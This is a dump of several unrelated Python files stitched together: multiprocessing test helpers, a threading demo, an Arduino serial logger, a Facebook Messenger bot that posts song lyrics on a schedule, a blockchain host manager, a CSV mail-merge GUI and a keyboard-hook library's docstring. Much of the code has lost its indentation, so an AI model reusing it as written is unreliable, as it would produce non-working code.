RawArray = staticmethod(multiprocessing.RawArray)
class ManagerMixin(BaseMixin):
TYPE = 'manager'
Process = multiprocessing.Process
Queue = property(operator.attrgetter('manager.Queue'))
JoinableQueue = property(operator.attrgetter('manager.JoinableQueue'))
Lock = property(operator.attrgetter('manager.Lock'))
RLock = property(operator.attrgetter('manager.RLock'))
Semaphore = property(operator.attrgetter('manager.Semaphore'))
BoundedSemaphore = property(operator.attrgetter('manager.BoundedSemaphore'))
Condition = property(operator.attrgetter('manager.Condition'))
Event = property(operator.attrgetter('manager.Event'))
Barrier = property(operator.attrgetter('manager.Barrier'))
Value = property(operator.attrgetter('manager.Value'))
Array = property(operator.attrgetter('manager.Array'))
list = property(operator.attrgetter('manager.list'))
dict = property(operator.attrgetter('manager.dict'))
Namespace = property(operator.attrgetter('manager.Namespace'))
@classmethod
def Pool(cls, *args, **kwds):
return cls.manager.Pool(*args, **kwds)
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.manager = multiprocessing.Manager()
@classmethod
def tearDownClass(cls):
# only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
print("Warning -- multiprocessing.Manager still has %s active "
"children after %s seconds"
% (multiprocessing.active_children(), dt),
file=sys.stderr)
break
gc.collect() # do garbage collection
if cls.manager._number_of_objects() != 0:
# This is not really an error since some tests do not
# ensure that all processes which hold a reference to a
# managed object have been joined.
test.support.environment_altered = True
print('Warning -- Shared objects which still exist at manager '
'shutdown:')
print(cls.manager._debug_info())
cls.manager.shutdown()
cls.manager.join()
cls.manager = None
super().tearDownClass()
class ThreadsMixin(BaseMixin):
TYPE = 'threads'
Process = multiprocessing.dummy.Process
connection = multiprocessing.dummy.connection
current_process = staticmethod(multiprocessing.dummy.current_process)
active_children = staticmethod(multiprocessing.dummy.active_children)
Pool = staticmethod(multiprocessing.dummy.Pool)
Pipe = staticmethod(multiprocessing.dummy.Pipe)
Queue = staticmethod(multiprocessing.dummy.Queue)
JoinableQueue = staticmethod(multiprocessing.dummy.JoinableQueue)
Lock = staticmethod(multiprocessing.dummy.Lock)
RLock = staticmethod(multiprocessing.dummy.RLock)
Semaphore = staticmethod(multiprocessing.dummy.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.dummy.BoundedSemaphore)
Condition = staticmethod(multiprocessing.dummy.Condition)
Event = staticmethod(multiprocessing.dummy.Event)
Barrier = staticmethod(multiprocessing.dummy.Barrier)
Value = staticmethod(multiprocessing.dummy.Value)
Array = staticmethod(multiprocessing.dummy.Array)
#
# Functions used to create test cases from the base ones in this module
#
def install_tests_in_module_dict(remote_globs, start_method):
__module__ = remote_globs['__name__']
local_globs = globals()
ALL_TYPES = {'processes', 'threads', 'manager'}
for name, base in local_globs.items():
if not isinstance(base, type):
continue
if issubclass(base, BaseTestCase):
if base is BaseTestCase:
continue
assert set(base.ALLOWED_TYPES) <= ALL_TYPES, base.ALLOWED_TYPES
for type_ in base.ALLOWED_TYPES:
newname = 'With' + type_.capitalize() + name[1:]
Mixin = local_globs[type_.capitalize() + 'Mixin']
class Temp(base, Mixin, unittest.TestCase):
pass
Temp.__name__ = Temp.__qualname__ = newname
Temp.__module__ = __module__
remote_globs[newname] = Temp
elif issubclass(base, unittest.TestCase):
class Temp(base, object):
pass
Temp.__name__ = Temp.__qualname__ = name
Temp.__module__ = __module__
remote_globs[name] = Temp
dangling = [None, None]
old_start_method = [None]
def setUpModule():
multiprocessing.set_forkserver_preload(PRELOAD)
multiprocessing.process._cleanup()
dangling[0] = multiprocessing.process._dangling.copy()
dangling[1] = threading._dangling.copy()
old_start_method[0] = multiprocessing.get_start_method(allow_none=True)
try:
multiprocessing.set_start_method(start_method, force=True)
except ValueError:
raise unittest.SkipTest(start_method +
' start method not supported')
if sys.platform.startswith("linux"):
try:
lock = multiprocessing.RLock()
except OSError:
raise unittest.SkipTest("OSError raises on RLock creation, "
"see issue 3111!")
check_enough_semaphores()
util.get_temp_dir() # creates temp directory
multiprocessing.get_logger().setLevel(LOG_LEVEL)
def tearDownModule():
need_sleep = False
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
multiprocessing.set_start_method(old_start_method[0], force=True)
# pause a bit so we don't get warning about dangling threads/processes
processes = set(multiprocessing.process._dangling) - set(dangling[0])
if processes:
need_sleep = True
test.support.environment_altered = True
print('Warning -- Dangling processes: %s' % processes,
file=sys.stderr)
processes = None
threads = set(threading._dangling) - set(dangling[1])
if threads:
need_sleep = True
test.support.environment_altered = True
print('Warning -- Dangling threads: %s' % threads,
file=sys.stderr)
threads = None
# Sleep 500 ms to give time to child processes to complete.
if need_sleep:
time.sleep(0.5)
multiprocessing.process._cleanup()
test.support.gc_collect()
remote_globs['setUpModule'] = setUpModule
remote_globs['tearDownModule'] = tearDownModule
|
04-daemon.py
|
import time
import threading
def myfunc(name):
print(f"myfunc started with {name}")
time.sleep(10)
print("myfunc ended")
if __name__ == '__main__':
print('main started')
#myfunc('realpython')
    t = threading.Thread(target=myfunc, args=['realpython'], daemon=True)
t.start()
print('main ended')
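    # Note: because the thread is a daemon, the interpreter exits right after
    # "main ended", so "myfunc ended" is never printed. A minimal sketch to
    # let the worker finish instead:
    #
    #     t.join()    # block the main thread until myfunc returns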
|
capture_sensor_data.py
|
#!/usr/bin/env python3
import serial
from threading import Thread
from time import sleep, time
import argparse, logging, subprocess
import arduino_mode
parser = argparse.ArgumentParser()
parser.add_argument('-d', '--device', default='/dev/serial0', help="Device to use for serial connection")
parser.add_argument('-l', '--logfile', default=None, help="Log file to use")
parser.add_argument('-r', "--record_cmd", default=None, help="Command with arguments to record videos")
args = parser.parse_args()
try:
ser = serial.Serial(args.device, 115200)
sleep(1)
ser.flushInput()
except Exception as e:  # avoid a bare except, which would also swallow KeyboardInterrupt
    print("Failed to open serial port", args.device, "-", e)
    raise SystemExit(1)
if args.logfile is not None:
logging.basicConfig(filename=args.logfile, filemode='w', level=logging.DEBUG,
format='%(relativeCreated)d %(message)s')
#logging.Formatter(fmt='%(asctime)s.%(msecs)03d %(message)s', datefmt='%H:%M:%S')
#0 - Pass throttle and steering values from remote to the car and Pi
#1 - Pass throttle and steering values from Pi to the car, ignore remote
#2 - Pass steering values only from remote to the car, good for manual pushing during training
#3 - Pass steering values only from Pi to the car, pass throttle from remote - good for testing
# Set to training mode
#ser.write('m=2'.encode())
#ser.flush()
arduino_mode.set_mode(0)
logging.info(b'{"mode":0, "throttle":0, "steering":0}\n')
bCont = True
def output_function():
global bCont
while bCont:
try:
read_serial=ser.readline()
if len(read_serial):
if args.logfile is not None:
logging.info(read_serial)
else:
print(read_serial)
#sleep(.02)
except serial.SerialException:
pass
except KeyboardInterrupt:
bCont = False
thread = Thread(target = output_function)
thread.start()
#Run script to capture videos
try:
    if args.record_cmd is not None:  # default is None; guard before splitting
        subprocess.call(args.record_cmd.split())
except KeyboardInterrupt:
pass
bCont = False
# Wait for the other thread to finish
thread.join()
logging.shutdown()
ser.close()
|
papiezowa.py
|
import getpass
import logging
import os
import sys
import time
from random import randrange, uniform
from datetime import datetime as dt
from multiprocessing import Process
import fbchat
from dotenv import load_dotenv
import cookies
FORMAT = "%(asctime)s %(levelname)s: %(message)s"
logging.basicConfig(
format=FORMAT,
filename="/var/log/papiezowa/papiezowa.log",
level=logging.INFO,
)
logger = logging.getLogger(__name__)
def main_papa(thread, fake=False):
process = Process(target=bring_papaj, args=(thread, fake,))
return process
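# Note: main_papa only builds the Process object; it is started later, once
# the scheduling loop in __main__ sees the clock match PAPIEZOWA_TIME.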
def count_down_the_papaj(thread, fake=False, counter=3):
if counter == 0:
return
if not fake:
try:
thread.send_text(f"{counter}...")
except fbchat.HTTPError:
time.sleep(uniform(0.5, 2.5))
return count_down_the_papaj(thread, fake, counter)
else:
print(f"{counter}...")
time.sleep(1)
return count_down_the_papaj(thread, fake, counter-1)
def bring_papaj(thread, fake=False):
count_down_the_papaj(thread, fake)
with open("barka.txt", "r") as f:
for line in f:
if not fake:
try:
thread.send_text(line.strip("\n"))
except fbchat.HTTPError:
time.sleep(uniform(8.0, 11.0))
thread.send_text(line.strip("\n"))
else:
print("{}, {}".format(thread, line.strip("\n")))
time.sleep(uniform(2.0, 6.0))
def create_fb_threads(sess, sess_types, threads, thread_types):
chats = []
for thread, thread_type in zip(threads, thread_types):
if thread_type == "fake":
chat = thread
else:
chat = sess_types[False] if thread_type != "user" else sess_types[True]
chat = chat(session=sess, id=thread)
chats.append(chat)
return chats
if __name__ == "__main__":
if len(sys.argv) == 2:
if sys.argv[1] != "env":
print("Invalid argument. Session aborted")
sys.exit(1)
load_dotenv()
username = os.getenv("CLIENT", None)
password = os.getenv("PASSWORD", None)
threads = list(map(int, os.getenv("THREADS", None).split(",")))
thread_types = os.getenv("THREAD_TYPES", None).split(",")
try:
sess_cookies = cookies.load_cookies()
session = cookies.load_session(sess_cookies)
if not session:
session = fbchat.Session.login(username, password)
sess_types = (fbchat.Group, fbchat.User)
logger.info("Successfully logged in as {}".format(username))
client = fbchat.Client(session=session)
chats = create_fb_threads(session, sess_types, threads, thread_types)
logger.info(
"Created chats for %d, %d of type %s, %s", *threads, *thread_types
)
processes = [main_papa(c) for c in chats]
logger.info("Spawning processes to send messages for chats...")
while True:
curr_time = dt.now().time().strftime("%H:%M:%S")
if curr_time == os.getenv("PAPIEZOWA_TIME"):
[p.start() for p in processes]
logger.info(
"Successfuly spawned processes, start sending messages"
)
[p.join() for p in processes]
break
if not all([p.is_alive() for p in processes]):
logger.info("Successfuly send messages. Logging out")
cookies.save_cookies(session.get_cookies())
session.logout()
logger.info("Done!")
sys.exit(0)
except Exception as e:
logger.error("Error: %s", e)
sys.exit(1)
session.logout()
|
host.py
|
# Copyright IBM Corp, All Rights Reserved.
#
# SPDX-License-Identifier: Apache-2.0
#
import datetime
import logging
import os
import random
import sys
import time
from threading import Thread
from uuid import uuid4
from pymongo.collection import ReturnDocument
sys.path.append(os.path.join(os.path.dirname(__file__), '..', '..'))
from common import \
log_handler, \
FabricV1NetworkConfig, utils, \
LOG_LEVEL, CLUSTER_LOG_TYPES, CLUSTER_LOG_LEVEL, \
NETWORK_SIZE_FABRIC_V1, \
CLUSTER_PORT_START, CLUSTER_PORT_STEP, \
CONSENSUS_PLUGINS_FABRIC_V1, CONSENSUS_PLUGIN_SOLO, \
WORKER_TYPES, VCENTER, VCUSERNAME, VCPWD, \
VMNAME, VMMEMORY, VMCPU, VMNETMASK, VMGATEWAY, TEMPLATE, VMIP, \
VIRTUAL_MACHINE, VCIP, VCPORT, VMDNS, NETWORK, VMUUID,\
VC_DATACENTER, VC_DATASTORE, VC_CLUSTER, \
WORKER_TYPE_DOCKER, WORKER_TYPE_SWARM, WORKER_TYPE_VSPHERE, \
HOST_STATUS, HOST_STATUS_PENDING
from agent import DockerHost, VsphereHost, KubernetesHost
from modules import cluster
from modules.models import Host as HostModel
from modules.models import Cluster as ClusterModel
from modules.models import HostSchema
logger = logging.getLogger(__name__)
logger.setLevel(LOG_LEVEL)
logger.addHandler(log_handler)
def check_status(func):
def wrapper(self, *arg):
if not self.is_active(*arg):
logger.warning("Host inactive")
return False
else:
return func(self, *arg)
return wrapper
class HostHandler(object):
""" Main handler to operate the hosts.
    A host can be a worker such as a Docker host, a Swarm cluster or a Kubernetes cluster
"""
def __init__(self):
self.host_agents = {
'docker': DockerHost("docker"),
'swarm': DockerHost("swarm"),
'kubernetes': KubernetesHost(),
'vsphere': VsphereHost()
}
def create(self, name, worker_api, host_type, capacity=1,
log_level=CLUSTER_LOG_LEVEL[0],
log_type=CLUSTER_LOG_TYPES[0], log_server="", autofill="false",
schedulable="false", params=None):
""" Create a new docker host node
A docker host is potentially a single node or a swarm.
        Will be filled with clusters up to the given capacity.
:param name: name of the node
:param worker_api: worker_api of the host
:param host_type: docker host type docker or swarm
:param capacity: The number of clusters to hold
:param log_type: type of the log
:param log_level: level of the log
:param log_server: server addr of the syslog
        :param autofill: Whether to automatically fill up with chains
        :param schedulable: Whether cluster requests can be scheduled to it
:param params: extra data for vSphere host type
:return: True or False
"""
logger.debug("Create host: name={}, worker_api={}, host_type={}, "
"capacity={}, log={}/{}, autofill={}, schedulable={}"
.format(name, worker_api, host_type, capacity, log_type,
log_server, autofill, schedulable))
if params is None and not worker_api.startswith("tcp://"):
# params is None when host_type is either docker or swarm.
worker_api = "tcp://" + worker_api
if HostModel.objects(worker_api=worker_api).count():
logger.warning("{} already existed in db".format(worker_api))
return {}
if "://" not in log_server:
log_server = "udp://" + log_server
if log_type == CLUSTER_LOG_TYPES[0]:
log_server = ""
if not host_type:
logger.warning("Host {} cannot be setup".format(name))
return {}
hid = uuid4().hex
host = HostModel(id=hid,
name=name,
worker_api=worker_api,
capacity=capacity,
type=host_type,
log_level=log_level,
log_type=log_type,
log_server=log_server,
autofill=autofill == "true",
schedulable=schedulable == "true"
)
if (host_type == WORKER_TYPE_DOCKER or
host_type == WORKER_TYPE_SWARM):
if not self.host_agents[host_type].create(worker_api):
logger.warning("Host {} cannot be setup".format(name))
return {}
if host_type == WORKER_TYPE_VSPHERE:
vc = params.get(VCENTER)
vm = params.get(VIRTUAL_MACHINE)
vc_ip = vc.get(VCIP)
vc_username = vc.get(VCUSERNAME)
vc_passwd = vc.get(VCPWD)
vc_port = vc.get(VCPORT)
h_update = {
VMNAME: vm.get(VMNAME),
VMMEMORY: vm.get(VMMEMORY),
VMCPU: vm.get(VMCPU),
VMIP: vm.get(VMIP),
VMNETMASK: vm.get(VMNETMASK),
VMDNS: vm.get(VMDNS),
VMGATEWAY: vm.get(VMGATEWAY),
TEMPLATE: vc.get(TEMPLATE),
VC_DATACENTER: vc.get(VC_DATACENTER),
VC_CLUSTER: vc.get(VC_CLUSTER),
VC_DATASTORE: vc.get(VC_DATASTORE),
NETWORK: vc.get(NETWORK),
VCUSERNAME: vc_username,
VCPWD: vc_passwd,
VCPORT: vc_port,
HOST_STATUS: HOST_STATUS_PENDING
}
logger.debug("update {}".format(h_update))
host.status = HOST_STATUS_PENDING
try:
if self.host_agents[host_type].create(vc_ip,
vc_username,
vc_passwd, vc_port,
params, hid):
logger.info("Creating vSphere host{}".format(name))
except Exception as e: # Catch failure while connecting to vc.
logger.error("Host {} cannot be setup".format(name))
logger.error("{}".format(e))
return {"msg": "{}".format(e)}
host.save()
if capacity > 0 and autofill == "true": # should autofill it
self.fillup(str(hid))
return self._schema(host)
def get_by_id(self, id):
""" Get a host
:param id: id of the doc
:return: serialized result or obj
"""
try:
ins = HostModel.objects.get(id=id)
except Exception:
logger.warning("No host found with id=" + id)
return None
return ins
def update(self, id, d):
""" Update a host's property
TODO: may check when changing host type
:param id: id of the host
:param d: dict to use as updated values
:return: serialized result or obj
"""
logger.debug("Get a host with id=" + id)
h_old = self.get_by_id(id)
if not h_old:
logger.warning("No host found with id=" + id)
return {}
if h_old.status == "pending":
return {}
if "worker_api" in d and not d["worker_api"].startswith("tcp://"):
d["worker_api"] = "tcp://" + d["worker_api"]
if "capacity" in d:
d["capacity"] = int(d["capacity"])
if d["capacity"] < ClusterModel.objects(host=h_old).count():
logger.warning("Cannot set cap smaller than running clusters")
return {}
if "log_server" in d and "://" not in d["log_server"]:
d["log_server"] = "udp://" + d["log_server"]
if "log_type" in d and d["log_type"] == CLUSTER_LOG_TYPES[0]:
d["log_server"] = ""
if "autofill" in d:
d["autofill"] = d["autofill"] == "true"
if "schedulable" in d:
d["schedulable"] = d["schedulable"] == "true"
self.db_set_by_id(id, **d)
h_new = self.get_by_id(id)
return self._schema(h_new)
def list(self, filter_data={}):
""" List hosts with given criteria
        :param filter_data: dict of filter properties for the query
:return: iteration of serialized doc
"""
logger.info("filter data {}".format(filter_data))
hosts = HostModel.objects(__raw__=filter_data)
return self._schema(hosts, many=True)
def delete(self, id):
""" Delete a host instance
:param id: id of the host to delete
:return:
"""
logger.debug("Delete a host with id={0}".format(id))
try:
h = HostModel.objects.get(id=id)
except Exception:
logger.warning("Cannot delete non-existed host")
return False
host_type = h.type
if ClusterModel.objects(host=h).count():
logger.warning("Host type not found.")
return False
elif (host_type == WORKER_TYPE_DOCKER or
host_type == WORKER_TYPE_SWARM):
self.host_agents[host_type].delete(h.worker_api)
elif host_type == WORKER_TYPE_VSPHERE:
if h.status == "pending":
return False
vmuuid = h.vcparam[utils.VMUUID]
vcip = h.vcparam[utils.VCIP]
vcusername = h.vcparam[utils.VCUSERNAME]
vcpwd = h.vcparam[utils.VCPWD]
vcport = h.vcparam[utils.VCPORT]
self.host_agents[host_type].delete(vmuuid,
vcip,
vcusername,
vcpwd,
vcport)
h.delete()
return True
@check_status
def fillup(self, id):
"""
        Fill a host with clusters up to its capacity limit
:param id: host id
:return: True or False
"""
logger.debug("Try fillup host {}".format(id))
host = self.get_by_id(id)
if not host:
return False
if host.status != "active":
logger.warning("host {} is not active".format(id))
return False
clusters = ClusterModel.objects(host=host)
num_new = host.capacity - len(clusters)
if num_new <= 0:
logger.warning("host {} already full".format(id))
return True
free_ports = cluster.cluster_handler.find_free_start_ports(id, num_new)
logger.debug("Free_ports = {}".format(free_ports))
def create_cluster_work(start_port):
cluster_name = "{}_{}".format(
host.name,
int((start_port - CLUSTER_PORT_START) / CLUSTER_PORT_STEP))
cluster_size = random.choice(NETWORK_SIZE_FABRIC_V1)
config = FabricV1NetworkConfig(
consensus_plugin=CONSENSUS_PLUGIN_SOLO,
size=cluster_size)
cid = cluster.cluster_handler.create(name=cluster_name,
host_id=id, config=config,
start_port=start_port)
if cid:
logger.debug("Create cluster {} with id={}".format(
cluster_name, cid))
else:
logger.warning("Create cluster failed")
for p in free_ports:
t = Thread(target=create_cluster_work, args=(p,))
t.start()
time.sleep(0.2)
return True
@check_status
def clean(self, id):
"""
Clean a host's free clusters.
:param id: host id
:return: True or False
"""
logger.debug("clean host with id = {}".format(id))
host = self.get_by_id(id)
if not host:
return False
clusters = ClusterModel.objects(host=host)
if host.status != "active":
return False
if len(clusters) <= 0:
return True
host = self.db_set_by_id(id, **{"autofill": False})
schedulable_status = host.schedulable
if schedulable_status:
host = self.db_set_by_id(id, **{"schedulable": False})
for cluster_item in clusters:
cid = str(cluster_item.id)
t = Thread(target=cluster.cluster_handler.delete, args=(cid,))
t.start()
time.sleep(0.2)
if schedulable_status:
self.db_set_by_id(id, **{"schedulable": schedulable_status})
return True
def reset(self, id):
"""
        Reset a host to its initial state
        :param id: host id
        :return: True or False
        """
        logger.debug("reset host with id = {}".format(id))
        host = self.get_by_id(id)
        if not host or ClusterModel.objects(host=host).count() > 0:
            logger.warning("No resettable host found with id = {}".format(id))
return False
host_type = host.type
return self.host_agents[host_type].reset(host_type, host.worker_api)
def refresh_status(self, id):
"""
Refresh the status of the host by detection
        :param id: the id of the host whose status to refresh
        :return: True if the host is active, False otherwise
"""
host = self.get_by_id(id)
if not host:
logger.warning("No host found with id=" + id)
return False
if not self.host_agents[host.type]\
.refresh_status(host.worker_api):
logger.warning("Host {} is inactive".format(id))
self.db_set_by_id(id, **{"status": "inactive"})
return False
else:
self.db_set_by_id(id, **{"status": "active"})
return True
def is_active(self, host_id):
"""
        Check whether the host is active
        :param host_id: the id of the host to check
        :return: True if the host's status is active, False otherwise
"""
host = self.get_by_id(host_id)
if not host:
logger.warning("invalid host is given")
return False
return host.status == "active"
def get_active_host_by_id(self, id):
"""
Check if id exists, and status is active. Otherwise update to inactive.
:param id: host id
:return: host or None
"""
logger.debug("check host with id = {}".format(id))
try:
host = HostModel.objects.get(id=id)
except Exception:
logger.warning("No active host found with id=" + id)
return None
return host
def _serialize(self, doc, keys=['id', 'name', 'worker_api', 'capacity',
'type', 'create_ts', 'status', 'autofill',
'schedulable', 'log_level',
'log_type', 'log_server']):
""" Serialize an obj
:param doc: doc to serialize
:param keys: filter which key in the results
:return: serialized obj
"""
result = {}
if doc:
for k in keys:
result[k] = doc.get(k, '')
return result
def _schema(self, doc, many=False):
host_schema = HostSchema(many=many)
return host_schema.dump(doc).data
def schema(self, doc, many=False):
return self._schema(doc, many)
def db_set_by_id(self, id, **kwargs):
"""
Set the key:value pairs to the data
:param id: Which host to update
:param kwargs: kv pairs
:return: The updated host json dict
"""
        kwargs = dict(('set__' + k, v) for (k, v) in kwargs.items())
HostModel.objects(id=id).update(
upsert=True,
**kwargs
)
return HostModel.objects.get(id=id)
host_handler = HostHandler()
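# A minimal usage sketch (the values below are illustrative only, not taken
# from a real deployment):
#
#     new_host = host_handler.create(
#         name="worker-0",
#         worker_api="192.168.1.10:2375",   # "tcp://" is prepended automatically
#         host_type=WORKER_TYPE_DOCKER,
#         capacity=2,
#         autofill="true",                  # fill up with chains on creation
#     )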
|
convert.py
|
import csv
import os
import platform
import queue
import subprocess
import threading
from os import mkdir, unlink
from os.path import abspath, isdir, join, normpath
from tempfile import NamedTemporaryFile
from tkinter import *
from tkinter import messagebox, ttk
from base_window import BaseWindow
from docx2pdf import convert
from files import __location__
from mailmerge_tracking import MailMergeTracking
class Convert(BaseWindow):
def __init__(self, base, field_map, files, output_as_word, output_as_pdf, user_settings, limit=None):
super().__init__(user_settings = user_settings)
self.field_map = field_map
self.files = files
self.output_as_word = output_as_word
self.output_as_pdf = output_as_pdf
self.user_settings = user_settings
self.run_popup = Toplevel(takefocus=True)
self.run_popup.focus_force()
#self.run_popup.grab_set()
self.run_popup.protocol("WM_DELETE_WINDOW", self.on_closing)
self.run_popup.wm_title("Converting...")
self.run_popup.resizable(0, 0)
self.run_popup.columnconfigure(0,weight=1)
self.run_popup.configure(bg=self.window_bg)
self.running_description = StringVar(value="Mapping data to fields...")
self.running_description_label = Label(self.run_popup, bg=self.window_bg, fg=self.fg, textvariable=self.running_description, justify=LEFT)
self.running_description_label.grid(row=1, column=0, pady=(10,0), padx=5, sticky=W)
s = ttk.Style()
s.theme_use('alt')
s.configure('blue.Horizontal.TProgressbar', troughcolor = 'gray35', troughrelief = 'flat', background = '#2f92ff')
self.progress = ttk.Progressbar(self.run_popup, style = 'blue.Horizontal.TProgressbar', orient="horizontal",length=250, mode="determinate")
self.progress_indeterminate = ttk.Progressbar(self.run_popup, style = 'blue.Horizontal.TProgressbar', orient="horizontal",length=250, mode="indeterminate")
if limit is None:
with open(self.files.csv_file, encoding='utf8', newline='') as csv_file:
self.num_records = sum(1 for row in csv.reader(csv_file)) - 1
else:
self.num_records = limit
self.progress["maximum"] = self.num_records
self.progress_indeterminate["maximum"] = 100
self.running_count = StringVar(value="0 of "+str(self.num_records))
self.running_count_label = Label(self.run_popup, bg=self.window_bg, fg=self.fg, textvariable=self.running_count, justify=LEFT)
self.running_count_label.grid(row=1, column=1, pady=(10,0), padx=5, sticky=E)
self.progress.grid(row=2, column=0, columnspan=2, pady=(0,20), padx=5, sticky='ew')
self.run_popup.update_idletasks()
x = base.winfo_rootx()
y = base.winfo_rooty()
x_offset = base.winfo_width() / 2 - self.run_popup.winfo_width() / 2
y_offset = base.winfo_height() / 4 - self.run_popup.winfo_height() / 2
geom = "+%d+%d" % (x+x_offset,y+y_offset)
self.run_popup.wm_geometry(geom)
self.queue = queue.Queue()
self.cancel_convert = threading.Event()
self.thread = threading.Thread(target=self.write_out, args=(self.cancel_convert,limit))
self.thread.start()
self.run_popup.after(1, self.refresh_data)
def refresh_data(self):
"""
"""
        # if the worker thread is dead and the queue is drained,
        # close the popup and stop polling
if not self.thread.is_alive() and self.queue.empty():
self.run_popup.destroy()
return
# refresh the GUI with new data from the queue
while not self.queue.empty():
progress, description, mode = self.queue.get()
if mode == "determinate":
self.progress['value'] = progress
self.running_description.set(description)
self.running_count.set(str(progress)+" of "+str(self.num_records))
elif mode == "indeterminate":
self.progress.destroy()
self.running_count_label.destroy()
self.progress_indeterminate.grid(row=2, column=0, columnspan=2, pady=(0,20), padx=5, sticky='ew')
self.progress_indeterminate.start(20)
self.running_description.set(description)
elif mode == "holding":
pass
elif mode == "finished":
self.progress_indeterminate.stop()
self.run_popup.update()
        # timer to refresh the gui with data from the worker thread
self.run_popup.after(1, self.refresh_data)
def write_out(self, stopped, limit):
document = MailMergeTracking(self.files.template)
        merge_data = self.prepare_data(document, stopped, limit)
if not stopped.is_set():
self.queue.put((self.num_records, "Mapping data to fields...", "determinate"))
else: return
self.queue.put((0, "Merging into template...", "determinate"))
document.merge_templates(merge_data, separator="page_break", queue=self.queue, stopped=stopped)
self.queue.put((self.num_records, "Merging into template...", "determinate"))
self.queue.put((None, "Saving...", "indeterminate"))
if not stopped.is_set():
            docx_filepath, pdf_filepath = self.prepare_filenames()
else: return
if not stopped.is_set():
self.write_to_files(document, docx_filepath, pdf_filepath)
else: return
self.queue.put((None, "Opening...", "holding"))
if not stopped.is_set():
self.open_on_finish(docx_filepath, pdf_filepath)
else: return
self.queue.put((None, "Opening...", "finished"))
    def prepare_data(self, document, stopped, limit):
with open(self.files.csv_file, encoding='utf8', newline='') as csv_file:
csv_dict = csv.DictReader(csv_file)
merge_data = []
progress = 0
for row in csv_dict:
if limit is not None:
if progress == limit:
break
if not stopped.is_set():
merge_data.append({field:row[self.field_map[field]] for field in document.get_merge_fields()})
progress += 1
self.queue.put((progress, "Mapping data to fields...", "determinate"))
else: return
return merge_data
    def prepare_filenames(self):
docx_filename = str(self.files.filename)+".docx"
pdf_filename = str(self.files.filename)+".pdf"
if not isdir(self.files.folder):
mkdir(self.files.folder)
docx_filepath = normpath(abspath(join(self.files.folder, docx_filename)))
pdf_filepath = normpath(abspath(join(self.files.folder, pdf_filename)))
return (docx_filepath, pdf_filepath)
def write_to_files(self, document, docx_filepath, pdf_filepath):
if not self.output_as_word:
temp_docx = NamedTemporaryFile(delete=False, suffix=".docx")
temp_docx.close()
document.write(temp_docx.name)
document.close()
try:
convert(temp_docx.name, pdf_filepath)
except NotImplementedError:
pass
unlink(temp_docx.name)
if not self.output_as_pdf:
document.write(docx_filepath)
document.close()
if self.output_as_word and self.output_as_pdf:
document.write(docx_filepath)
document.close()
try:
convert(docx_filepath, pdf_filepath)
except NotImplementedError:
pass
def open_on_finish(self, docx_filepath, pdf_filepath):
if platform.system() == 'Darwin': # macOS
if self.output_as_word:
subprocess.call(('open', docx_filepath))
if self.output_as_pdf:
subprocess.call(('open', pdf_filepath))
elif platform.system() == 'Windows': # Windows
if self.output_as_word:
os.startfile(docx_filepath)
if self.output_as_pdf:
os.startfile(pdf_filepath)
        else: # linux variants
            if self.output_as_word:
                subprocess.call(('xdg-open', docx_filepath))
            if self.output_as_pdf:
                subprocess.call(('xdg-open', pdf_filepath))
def on_closing(self):
if messagebox.askyesno("CSV 2 Paper", "Are you sure you want to cancel?"):
self.cancel_convert.set()
if self.thread.is_alive():
self.thread.join()
self.run_popup.destroy()
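# Design note: the worker thread above never touches Tk widgets; it only puts
# (progress, description, mode) tuples on self.queue, and the Tk main loop
# drains that queue from refresh_data(), which re-arms itself with after().
# A stripped-down, runnable sketch of the same pattern (independent of this
# class; names are illustrative):
#
#     import queue, threading, tkinter as tk
#
#     def worker(q):
#         for i in range(5):
#             q.put(i)                # the worker only writes to the queue
#
#     root = tk.Tk()
#     q = queue.Queue()
#     threading.Thread(target=worker, args=(q,), daemon=True).start()
#
#     def poll():
#         while not q.empty():
#             print(q.get())          # GUI thread consumes and updates widgets
#         root.after(50, poll)        # re-arm, exactly like refresh_data()
#
#     poll()
#     root.mainloop()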
|
__init__.py
|
# -*- coding: utf-8 -*-
"""
keyboard
========
Take full control of your keyboard with this small Python library. Hook global events, register hotkeys, simulate key presses and much more.
## Features
- **Global event hook** on all keyboards (captures keys regardless of focus).
- **Listen** and **send** keyboard events.
- Works with **Windows** and **Linux** (requires sudo), with experimental **OS X** support (thanks @glitchassassin!).
- **Pure Python**, no C modules to be compiled.
- **Zero dependencies**. Trivial to install and deploy, just copy the files.
- **Python 2 and 3**.
- Complex hotkey support (e.g. `ctrl+shift+m, ctrl+space`) with controllable timeout.
- Includes **high level API** (e.g. [record](#keyboard.record) and [play](#keyboard.play), [add_abbreviation](#keyboard.add_abbreviation)).
- Maps keys as they actually are in your layout, with **full internationalization support** (e.g. `Ctrl+ç`).
- Events automatically captured in separate thread, doesn't block main program.
- Tested and documented.
- Doesn't break accented dead keys (I'm looking at you, pyHook).
- Mouse support available via project [mouse](https://github.com/boppreh/mouse) (`pip install mouse`).
## Usage
Install the [PyPI package](https://pypi.python.org/pypi/keyboard/):
pip install keyboard
or clone the repository (no installation required, source files are sufficient):
git clone https://github.com/boppreh/keyboard
or [download and extract the zip](https://github.com/boppreh/keyboard/archive/master.zip) into your project folder.
Then check the [API docs below](https://github.com/boppreh/keyboard#api) to see what features are available.
## Example
```py
import keyboard
keyboard.press_and_release('shift+s, space')
keyboard.write('The quick brown fox jumps over the lazy dog.')
keyboard.add_hotkey('ctrl+shift+a', print, args=('triggered', 'hotkey'))
# Press PAGE UP then PAGE DOWN to type "foobar".
keyboard.add_hotkey('page up, page down', lambda: keyboard.write('foobar'))
# Blocks until you press esc.
keyboard.wait('esc')
# Record events until 'esc' is pressed.
recorded = keyboard.record(until='esc')
# Then replay back at three times the speed.
keyboard.play(recorded, speed_factor=3)
# Type @@ then press space to replace with abbreviation.
keyboard.add_abbreviation('@@', 'my.long.email@example.com')
# Block forever, like `while True`.
keyboard.wait()
```
## Known limitations:
- Events generated under Windows don't report device id (`event.device == None`). [#21](https://github.com/boppreh/keyboard/issues/21)
- Media keys on Linux may appear nameless (scan-code only) or not at all. [#20](https://github.com/boppreh/keyboard/issues/20)
